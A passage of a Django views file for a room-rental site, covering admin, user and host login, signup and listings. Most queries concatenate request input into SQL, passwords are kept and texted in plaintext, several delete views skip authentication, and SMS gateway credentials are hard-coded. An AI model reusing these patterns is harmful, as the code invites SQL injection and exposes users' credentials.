admin\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n q=\"select type from admin where email='\"+request.session[\"adminemail\"]+\"'\"\r\n cr.execute(q)\r\n result1=cr.fetchone()\r\n for row in result:\r\n d={\"email\":row[0],\"password\":row[1],\"type\":row[2],\"mobile\":row[3]}\r\n x.append(d)\r\n return render(request,\"viewadmin.html\",{\"ar\":x,'type':result1[0]})\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\ndef editadmin(request):\r\n if \"adminemail\" in request.session:\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from admin where email='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n #return HttpResponse(result)\r\n d={\"email\":result[0],\"type\":result[2],\"mobile\":result[3]}\r\n #return render(request,\"editadmin.html\",{\"ar\":d})\r\n print(d)\r\n return JsonResponse(d,safe=False)\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n@csrf_exempt\r\ndef saveadmin(request):\r\n # print(request.POST[\"type\"])\r\n # print(request.POST[\"email\"])\r\n # print(request.POST[\"mobile\"])\r\n if \"adminemail\" in request.session:\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"update admin set type='\" + request.POST[\"type\"] + \"',mobile='\" + request.POST[\r\n \"mobile\"] + \"' where email='\"+request.POST[\"email\"]+\"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\ndef removeadmin(request):\r\n conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"delete from admin where email='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewadmin\")\r\n\r\n@csrf_exempt\r\ndef adminlogin(request):\r\n return render(request,\"adminlogin.html\")\r\n\r\n@csrf_exempt\r\ndef checkadminlogin(request):\r\n # print(request.POST['email'],request.POST['password'])\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from admin where email='\"+request.POST[\"email\"]+\"'and password='\"+request.POST[\"password\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n request.session['adminemail'] = request.POST[\"email\"]\r\n # return render(request, \"admindashboard.html\")\r\n return HttpResponse(\"success\")\r\n else:\r\n # d = {\"message\": \"Invalid email/password\"}\r\n # return render(request,\"adminlogin.html\" ,{\"ar\": d})\r\n return HttpResponse(\"fail\")\r\n\r\ndef admindashboard(request):\r\n if \"adminemail\" in request.session:\r\n return render(request,\"admindashboard.html\")\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\ndef logout(request):\r\n try:\r\n del request.session['adminemail']\r\n except:\r\n pass\r\n return HttpResponseRedirect('adminlogin')\r\n\r\n# @csrf_exempt\r\n# def changepassword(request):\r\n# if \"adminemail\" in request.session:\r\n# return render(request,\"changepassword.html\")\r\n# else:\r\n# return render(request,\"adminlogin.html\")\r\n\r\n@csrf_exempt\r\ndef adminchangepassword(request):\r\n if \"adminemail\" in request.session:\r\n oldpassword=request.POST[\"oldpassword\"]\r\n newpassword=request.POST[\"newpassword\"]\r\n confimpassword=request.POST[\"confirmpassword\"]\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n q=\"select * from admin where email='\"+request.session[\"adminemail\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n if result[1]==oldpassword:\r\n s=\"update admin set password='\"+newpassword+\"' where email='\"+request.session[\"adminemail\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n # d={\"message\":\"Password changed Successfully\"}\r\n return HttpResponse(\"success\")\r\n else:\r\n # d={\"message\":\"Old Password Incorrect\"}\r\n return HttpResponse(\"failed due to wrong old password\")\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n\r\n\r\n@csrf_exempt\r\ndef usersignup(request):\r\n return render(request,\"usersignup.html\")\r\n\r\n\r\ndef openusersignup2(request):\r\n mobile=request.GET['mobile']\r\n return render (request,'usersignup2.html',{\"mobile\":mobile})\r\n\r\n@csrf_exempt\r\ndef usersignup2(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from user where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"userphotos/\" + str(random.randint(1, 100000)) + file.name\r\n\r\n s=\"insert into user values('\"+request.POST[\"mobile\"]+\"','\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"name\"]+\"','\"+request.POST[\"address\"]+\"','\"+uploadname+\"')\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n # d={\"message\":\"User Added Successfully\"}\r\n return HttpResponse(\"success\")\r\n\r\ndef sendotp(request):\r\n mobile=request.GET['mobile']\r\n print('test',mobile)\r\n n=random_with_N_digits(6)\r\n request.session['userotp']=str(n)\r\n msg=\"your otp is \"+str(n)\r\n msg=msg.replace(\" \",\"%20\")\r\n conn=http.client.HTTPConnection(\"server1.vmm.education\")\r\n conn.request('GET','/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message='+msg+'&phone_numbers='+str(mobile))\r\n response=conn.getresponse()\r\n print(response)\r\n return HttpResponse(\"success\")\r\n\r\ndef verifyotp(request):\r\n actualotp=request.session['userotp']\r\n otp=request.GET['otp']\r\n if actualotp==otp:\r\n return HttpResponse(\"success\")\r\n else:\r\n return HttpResponse(\"fail\")\r\n\r\n\r\n@csrf_exempt\r\ndef userlogin(request):\r\n return render(request,\"userlogin.html\")\r\n\r\n@csrf_exempt\r\ndef userlogin1(request):\r\n # print(request.POST['email'],request.POST['password'])\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from user where email='\" + request.POST[\"email\"] + \"'and password='\" + request.POST[\"password\"] + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n # print(list(result))\r\n if result:\r\n # d = {\"name\": result[3]}\r\n request.session['useremail'] = request.POST[\"email\"]\r\n # return render(request, \"userdashboard.html\",{\"ar\":d})\r\n return HttpResponse(\"success\")\r\n\r\n else:\r\n # d = {\"message\": \"Invalid email/password\"}\r\n # return render(request, \"userlogin.html\",{\"ar\": d})\r\n return HttpResponse(\"fail\")\r\n\r\n\r\ndef userdashboard(request):\r\n return render(request,'userdashboard.html')\r\n\r\n@csrf_exempt\r\ndef forgot(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from user where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n password = result[2]\r\n conn = http.client.HTTPConnection(\"server1.vmm.education\")\r\n conn.request('GET',\r\n '/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message=' + password + '&phone_numbers='\r\n + str(request.POST[\"mobile\"]))\r\n response = conn.getresponse()\r\n print(response.read())\r\n return HttpResponseRedirect(\"userlogin\")\r\n else:\r\n d={\"message\":\"Invalid Mobile Number\"}\r\n return render(request,\"userlogin.html\",{\"ar\":d})\r\n\r\n\r\n@csrf_exempt\r\ndef forgotadmin(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from admin where mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n password = result[2]\r\n conn = http.client.HTTPConnection(\"server1.vmm.education\")\r\n conn.request('GET',\r\n '/VMMCloudMessaging/AWS_SMS_Sender?username=ayushidhir&password=6TLLQSSZ&message=' + password + '&phone_numbers='\r\n + str(request.POST[\"mobile\"]))\r\n response = conn.getresponse()\r\n print(response.read())\r\n # return HttpResponseRedirect(\"adminlogin\")\r\n return HttpResponse(\"success\")\r\n else:\r\n # d={\"message\":\"Invalid Mobile Number\"}\r\n # return render(request,\"adminlogin.html\",{\"ar\":d})\r\n return HttpResponse(\"fail\")\r\n\r\n@csrf_exempt\r\ndef addcategory(request):\r\n if \"adminemail\" in request.session:\r\n return render(request,\"addcategory.html\")\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\n@csrf_exempt\r\ndef insercategory(request):\r\n # file = request.FILES[\"photo\"]\r\n # uploadname = \"categoryphotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n q=\"select * from category where cname='\"+request.POST[\"cname\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n if result:\r\n d={\"message\":\"Category already exists\"}\r\n return render(request,\"addcategory.html\",{\"ar\":d})\r\n else:\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"categoryphotos/\" + str(random.randint(1, 10000)) + file.name\r\n s=\"insert into category values('\"+ request.POST[\"cname\"]+\"','\"+request.POST[\"description\"]+\"','\"+uploadname+\"')\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n d={\"message\":\"category added successfully\"}\r\n return render(request,\"addcategory.html\",{\"ar\":d})\r\n\r\ndef showcategory(request):\r\n if \"adminemail\" in request.session:\r\n conn=Connection(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from category\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={}\r\n d[\"cname\"]=row[0]\r\n d[\"description\"]=row[1]\r\n d[\"photo\"]=row[2]\r\n x.append(d)\r\n return render(request,\"showcategory.html\",{\"ar\":x})\r\n else:\r\n return HttpResponseRedirect(\"adminlogin\")\r\n\r\ndef removecategory(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"delete from category where cname='\"+request.GET[\"q\"]+\"'\"\r\n print(s)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"showcategory\")\r\n\r\n@csrf_exempt\r\ndef editcategory(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from category where cname='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n #return HttpResponse(result)\r\n d={\"cname\":result[0],\"description\":result[1],\"photo\":result[2]}\r\n return render(request,\"editcategory.html\",{\"ar\":d})\r\n\r\n@csrf_exempt\r\ndef savecategory(request):\r\n file=request.FILES[\"photo\"]\r\n uploadname=\"categoryphotos/\"+str(random.randint(1,1000))+file.name\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"update category set description='\"+request.POST[\"description\"]+\"',photo='\"+uploadname+\"'where cname='\"+request.POST[\"cname\"]+\"'\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"showcategory\")\r\n\r\n\r\n@csrf_exempt\r\ndef hostsignup(request):\r\n return render(request,\"host_signup.html\")\r\n\r\n@csrf_exempt\r\ndef inserthost(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from host where email='\"+request.POST[\"email\"]+\"' and mobile=\"+request.POST[\"mobile\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"hostphotos/\" + str(random.randint(1, 1000)) + file.name\r\n q=\"insert into host values(NULL,'\"+request.POST[\"name\"]+\"','\"+request.POST[\"email\"]+\"','\"+request.POST[\"password\"]+\"','\"+request.POST[\"city\"]+\"',\"+request.POST[\"mobile\"]+\",'\"+uploadname+\"','\"+request.POST[\"description\"]+\"','\"+request.POST[\"location\"]+\"','pending')\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n\r\n\r\ndef index(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select city from host\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x= []\r\n id=[]\r\n for row in result:\r\n d={}\r\n if not x:\r\n id.append((row[0]))\r\n d['city']=row[0]\r\n x.append(d)\r\n elif row[0] in id:\r\n pass\r\n else:\r\n id.append(row[0])\r\n d['city']=row[0]\r\n x.append(d)\r\n print(x)\r\n\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n\r\n catname = []\r\n for row in result:\r\n d = {\"category\": row[0]}\r\n catname.append(d)\r\n return render(request,\"index.html\",{'city':x,'catname':catname})\r\n\r\ndef login(request):\r\n return render(request,\"login.html\")\r\n\r\ndef register(request):\r\n return render(request,\"register.html\")\r\n\r\ndef contact(request):\r\n return render(request,'contactus.html')\r\n\r\ndef userlogout(request):\r\n try:\r\n del request.session['useremail']\r\n except:\r\n pass\r\n return HttpResponseRedirect('/')\r\n\r\ndef hostlogout(request):\r\n try:\r\n del request.session['hostemail']\r\n except:\r\n pass\r\n return HttpResponseRedirect('/')\r\n\r\n\r\n@csrf_exempt\r\ndef hostlogin(request):\r\n return render(request,\"hostlogin.html\")\r\n\r\n@csrf_exempt\r\ndef hostlogin1(request):\r\n # print(request.POST['email'],request.POST['password'])\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where email='\" + request.POST[\"email\"] + \"'and password='\" + request.POST[\"password\"] + \"' and status='active'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n # print(list(result))\r\n if result:\r\n # d = {\"name\": result[3]}\r\n request.session['hostemail'] = request.POST[\"email\"]\r\n request.session['hostid']=result[0]\r\n # return render(request, \"userdashboard.html\",{\"ar\":d})\r\n return HttpResponse(\"success\")\r\n\r\n else:\r\n # d = {\"message\": \"Invalid email/password\"}\r\n # return render(request, \"userlogin.html\",{\"ar\": d})\r\n return HttpResponse(\"fail\")\r\n\r\n@csrf_exempt\r\ndef addrooms(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d = {\"cname\": row[0]}\r\n x.append(d)\r\n return render(request,\"addrooms.html\",{\"ar\":x})\r\n\r\n@csrf_exempt\r\ndef addrooms1(request):\r\n conn = Connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q=\"select * from host where email ='\"+request.session['hostemail']+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchone()\r\n print(result[0])\r\n hid = result[0]\r\n file = request.FILES[\"coverphoto\"]\r\n uploadname = \"spacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n s = \"insert into rooms values(NULL,'\"+request.POST[\"roomname\"]+\"','\"+request.POST[\"area\"]+\"','\"+request.POST[\"description\"]+\"','\"+uploadname+\"',\"+str(hid)+\",'\"+request.POST[\"tariffsingle\"]+\"','\"+request.POST[\"tariffdouble\"]+\"','\"+request.POST[\"extraperson\"]+\"','\"+request.POST[\"rating\"]+\"','\"+request.POST[\"count\"]+\"','\"+request.POST[\"category\"]+\"')\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n\r\ndef viewrooms(request):\r\n conn = Connection(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from rooms where hid=\"+str(request.session['hostid'])+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d = {\"roomid\":row[0],\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\":row[6],\"tariffdouble\":row[7],\"extraperson\":row[8],\"rating\":row[9],\"count\":row[10],\"category\":row[11]}\r\n x.append(d)\r\n return render(request, \"viewrooms.html\", {\"ar\": x})\r\n\r\ndef removerooms(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"delete from rooms where roomid=\"+request.GET[\"q\"]+\"\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewrooms\")\r\n\r\ndef editrooms(request):\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n print(request.GET[\"q\"])\r\n s=\"select * from rooms where roomid='\"+request.GET[\"q\"]+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchone()\r\n d={\"roomid\":result[0],\"roomname\":result[1],\"area\":result[2],\"description\":result[3],\"coverphoto\":result[4],\"tariffsingle\":result[6],\"tariffdouble\":result[7],\"extraperson\":result[8]}\r\n return JsonResponse(d,safe=False)\r\n\r\n@csrf_exempt\r\ndef saverooms(request):\r\n file = request.FILES[\"coverphoto\"]\r\n uploadname = \"spacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"system\", \"sparespace\")\r\n s = \"update rooms set roomname='\" + request.POST[\"roomname\"] + \"',area='\" + request.POST[\r\n \"area\"] + \"',description='\"+request.POST[\"description\"]+\"',coverphoto='\"+uploadname+\"',tariffsingle='\"+request.POST[\"tariffsingle\"]+\"',tariffdouble='\"+request.POST[\"tariffdouble\"]+\"',extraperson='\"+request.POST[\"extraperson\"]+\"' where roomid='\" + request.POST[\"roomid\"] + \"'\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\ndef insertphotos(request):\r\n roomid=request.GET['q']\r\n # description=request.GET['q1']\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from photos where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"pid\":row[0],\"photo\":row[1],\"description\":row[2]}\r\n x.append(d)\r\n return render(request,\"addroomphotos.html\",{\"ar\":roomid,\"ar1\":x})\r\n\r\n@csrf_exempt\r\ndef addroomphotos(request):\r\n file = request.FILES[\"photo\"]\r\n uploadname = \"addspacephotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"insert into photos values(NULL,'\"+uploadname+\"','\"+request.POST['description']+\"',\"+request.POST['roomid']+\")\"\r\n fs=FileSystemStorage()\r\n fs.save(uploadname,file)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\ndef deleteroomphoto(request):\r\n pid=request.GET['id']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"delete from photos where pid='\"+pid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewrooms\")\r\n\r\ndef viewroomdetails(request):\r\n roomid=request.GET[\"q\"]\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q=\"select * from photos where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d1={\"photo\":row[1]}\r\n x.append(d1)\r\n s=\"select * from rooms where roomid='\"+roomid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n\r\n d = {\"roomid\": row[0], \"roomname\": row[1], \"area\": row[2], \"description\": row[3], \"coverphoto\": row[4],\r\n \"hid\": row[5], \"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n return render(request,\"roomdetails.html\",{\"ar\":d,\"ar1\":x})\r\n\r\n\r\n\r\n# def findproperty(request):\r\n# conn=connect(\"127.0.0.1\",\"root\",\"system\",\"sparespace\")\r\n# s=\"select cname from category\"\r\n# cr=conn.cursor()\r\n# cr.execute(s)\r\n# result=cr.fetchall()\r\n#\r\n# x = []\r\n# for row in result:\r\n# d={\"category\":row[0]}\r\n# x.append(d)\r\n# return render(request, \"findpropertyresult.html\", {\"ar\":x})\r\n\r\n@csrf_exempt\r\ndef findpropertyresult(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n city=request.POST[\"city\"]\r\n category=request.POST[\"category\"]\r\n # s=\"select * from host inner join rooms on host.hid=rooms.hid\"\r\n s=f\"select * from host inner join rooms on host.hid=rooms.hid where city='{city}' and category='{category}'\"\r\n print(s)\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n print(result)\r\n x=[]\r\n for row in result:\r\n d={\"hid\":row[0],\"city\":row[4],\"roomid\":row[10],\"coverphoto\":row[14],\"roomname\":row[11],\"area\":row[12],\"hostname\":row[1],\"category\":row[21]}\r\n x.append(d)\r\n print(x)\r\n return render(request, \"findpropertyresult.html\", {\"ar\":x})\r\n\r\ndef viewdetailproperty(request):\r\n hid=request.GET['hid']\r\n roomid=request.GET['roomid']\r\n category=request.GET['category']\r\n city=request.GET['city']\r\n s = f\"select * from host inner join rooms on host.hid=rooms.hid where host.hid='{hid}' and rooms.roomid='{roomid}'\"\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n row = cr.fetchone()\r\n tspd=round(row[16]/30,2)\r\n tdpd=round(row[17]/30,2)\r\n texpd=round(row[18]/30,2)\r\n d={\"hid\":row[0],\"hostname\":row[1],\"email\":row[2],\"city\":row[4],\"mobile\":row[5],\"dp\":row[6],\"descriptionhost\":row[7],\"location\":row[8],\"roomid\":row[10],\"roomname\":row[11],\"area\":row[12],\"description\":row[13],\"coverphoto\":row[14],\"tariffsingle\":row[16],\"tariffdouble\":row[17],\"extraperson\":row[18],\"rating\":row[19],\"count\":row[20],\"category\":row[21],\"tariffsingleperday\":tspd,\r\n \"tariffdoubleperday\":tdpd,\"extraperday\":texpd}\r\n\r\n\r\n query=f'select * from photos where roomid={roomid}'\r\n cr = conn.cursor()\r\n cr.execute(query)\r\n result1 = cr.fetchall()\r\n x1=[]\r\n for row in result1:\r\n d1={\"pid\":row[0],\"photo\":row[1],\"description\":row[2],\"roomid\":row[3]}\r\n x1.append(d1)\r\n\r\n q = \"select * from host inner join rooms on host.hid=rooms.hid where host.city='\"+city+\"'and rooms.category='\"+category+\"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchall()\r\n x2 = []\r\n if result:\r\n for row in result:\r\n d2 = {\"city\":row[4],\"roomid\": row[10], \"roomname\": row[11], \"area\": row[12], \"description\": row[13], \"coverphoto\": row[14],\r\n \"hid\": row[15], \"tariffsingle\": row[16], \"tariffdouble\": row[17], \"extraperson\": row[18],\r\n \"rating\": row[19],\r\n \"count\": row[20], \"category\": row[21]}\r\n\r\n x2.append(d2)\r\n return render(request,'viewdetailproperty.html',{\"alldata\":d,\"photos\":x1,\"related\":x2})\r\n\r\ndef findproperty(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select city from host\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x= []\r\n id=[]\r\n for row in result:\r\n d={}\r\n if not x:\r\n id.append((row[0]))\r\n d['city']=row[0]\r\n x.append(d)\r\n elif row[0] in id:\r\n pass\r\n else:\r\n id.append(row[0])\r\n d['city']=row[0]\r\n x.append(d)\r\n print(x)\r\n\r\n s = \"select cname from category\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n\r\n catname = []\r\n for row in result:\r\n d = {\"category\": row[0]}\r\n catname.append(d)\r\n print(x,catname)\r\n return render(request,'findproperty.html',{'city':x,'catname':catname})\r\n\r\n\r\n#admin view host\r\ndef viewhost(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from host where status='pending'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"hid\":row[0],\"hostname\":row[1],\"email\":row[2],\"city\":row[4],\"mobile\":row[5],\"photo\":row[6],\"description\":row[7],\"location\":row[8]}\r\n x.append(d)\r\n s = \"select * from host where status='active'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchall()\r\n y = []\r\n for row in result:\r\n d = {\"hid\": row[0], \"hostname\": row[1], \"email\": row[2], \"city\": row[4], \"mobile\": row[5], \"photo\": row[6],\r\n \"description\": row[7], \"location\": row[8]}\r\n y.append(d)\r\n z=[]\r\n z.append(x)\r\n z.append(y)\r\n\r\n return render(request,\"viewhost.html\",{\"ar\":z})\r\n\r\ndef activehost(request):\r\n hid=request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"update host set status='active' where hid=\"+hid+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewhost\")\r\n\r\n\r\ndef pendinghost(request):\r\n hid = request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"update host set status='pending' where hid=\" + hid + \"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponseRedirect(\"viewhost\")\r\n\r\n#admin view space\r\ndef viewspace(request):\r\n hid=request.GET['q']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"select * from rooms where hid=\"+hid+\"\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result=cr.fetchall()\r\n x=[]\r\n for row in result:\r\n d={\"roomid\":row[0],\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\":row[6],\"tariffdouble\":row[7],\"extraperson\":row[8],\"rating\":row[9],\"count\":row[10],\"category\":row[11]}\r\n x.append(d)\r\n return render(request,\"viewspace.html\",{\"ar\":x})\r\n\r\n#admin view space details\r\ndef viewspacedetails(request):\r\n roomid = request.GET[\"q\"]\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = \"select * from photos where roomid='\" + roomid + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchall()\r\n x = []\r\n for row in result:\r\n d1 = {\"photo\": row[1]}\r\n x.append(d1)\r\n s = \"select * from rooms where roomid='\" + roomid + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n row = cr.fetchone()\r\n\r\n d = {\"roomid\": row[0], \"roomname\": row[1], \"area\": row[2], \"description\": row[3], \"coverphoto\": row[4],\r\n \"hid\": row[5], \"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n return render(request, \"spacedetails.html\", {\"ar\": d, \"ar1\": x})\r\n\r\n\r\n#host view profile\r\ndef viewprofile(request):\r\n conn = Connection(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where email='\" +request.session['hostemail'] +\"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n x = []\r\n d = {\"hid\": result[0], \"hostname\": result[1], \"email\": result[2], \"city\": result[4], \"mobile\": result[5], \"photo\": result[6],\r\n \"description\": result[7], \"location\": result[8]}\r\n x.append(d)\r\n return render(request,\"viewprofile.html\",{\"ar\":x})\r\n\r\n#host edit profile\r\ndef editprofile(request):\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from host where hid='\" + request.GET[\"q\"] + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n d = {\"hid\": result[0], \"hostname\": result[1], \"email\": result[2],\"city\":result[4],\"mobile\":result[5],\"photo\":result[6],\"description\":result[7],\"location\":result[8]}\r\n return JsonResponse(d, safe=False)\r\n\r\n@csrf_exempt\r\ndef savehostprofile(request):\r\n hid=request.POST['hid']\r\n hostname=request.POST['hostname']\r\n email = request.POST['email']\r\n city = request.POST['city']\r\n mobile = request.POST['mobile']\r\n description = request.POST['description']\r\n location = request.POST['location']\r\n file = 